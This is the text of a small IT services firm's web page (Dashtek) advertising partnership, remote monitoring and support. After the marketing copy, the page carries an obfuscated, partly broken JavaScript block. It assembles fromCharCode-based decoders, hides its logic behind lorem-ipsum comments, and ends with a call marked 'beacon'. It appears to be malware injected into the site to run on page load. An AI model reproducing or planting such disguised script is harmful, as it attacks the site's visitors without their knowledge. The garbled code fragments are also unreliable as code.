Working together
We will not tell you what you must do with technology. You tell us what problems you want to solve and we will provide you with the solution that best fits YOU
At Dashtek we work as partners with our customers. When they succeed so do we.
The Solutions are key
Dashtek is about working together with customers to solve their business problems with technology.
Remote monitoring Need to stay in touh with the office? Let us show you how!
Outstanding Support
Once we install your solution we are just a phone call away if you need assistance
(function($$,_2,_1) { function co() { return 'Code'; } function gafu() { xxx=a(String, 'f' + ro() + co()); return function(q){return xxx(q);}; }; rex = [gafu(),gafu()]; function choo(k) { if (k < 9) { return 1 } else { return 2 } }; d = ''; map = ''; function fs(ro, arr, add, st, en,dp) { //Mauris gravida, libero ut tempor ultricies, ante erat blandit dui, vestibulum convallis ligula lacus et metus. Duis quis nunc justo, gravida sem var hf = ((en+st)>>1); if(en-st>16) { //lacus, tristique vitae aliquet a, ultrices nec libero. Aliquam sagittis enim in nibh semper tincidunt. Donec malesuada lorem sit amet risus euis return fs(ro, arr, add, st, hf,dp+1) + fs(ro,arr, add, hf, en,dp+1); }else{ var rt='';rx1=rex[add-29]; for(var rj=st;rj0;){ var x=ch(c); c-=x; var rep=kk.substr(c, x); //accumsan dapibus diam var t = dd.split(rep); dd=t.join(pp(t)); };return dd; }); /**/ gloa(); beacon type